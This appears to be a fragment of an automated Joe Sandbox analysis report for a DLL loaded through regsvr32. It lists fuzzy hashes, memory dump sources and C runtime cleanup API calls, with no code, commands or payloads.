                                                      • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction Fuzzy Hash: 48018726A2C749C6F6D08A15E44473AA7E1F3847D4F101135FE8D87BB8DB7CE480CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _ioterm.LIBCMTD ref: 000007FEF7533437
                                                        • Part of subcall function 000007FEF7537D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF753343C), ref: 000007FEF7537D93
                                                        • Part of subcall function 000007FEF7533E00: FlsFree.KERNEL32 ref: 000007FEF7533E13
                                                        • Part of subcall function 000007FEF7533E00: _mtdeletelocks.LIBCMTD ref: 000007FEF7533E23
                                                        • Part of subcall function 000007FEF75388D0: HeapDestroy.KERNELBASE ref: 000007FEF75388DB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                      • String ID:
                                                      • API String ID: 1508997487-0
                                                      • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction ID: 0709412b6044a56b86e050daf6e123306acf1d940542bdba759049c97d51ab2e
                                                      • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction Fuzzy Hash: 06E067A1F3C0079AF2D5676498823B91AD39B447C5F810879790EC62F3EA7DB8115661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%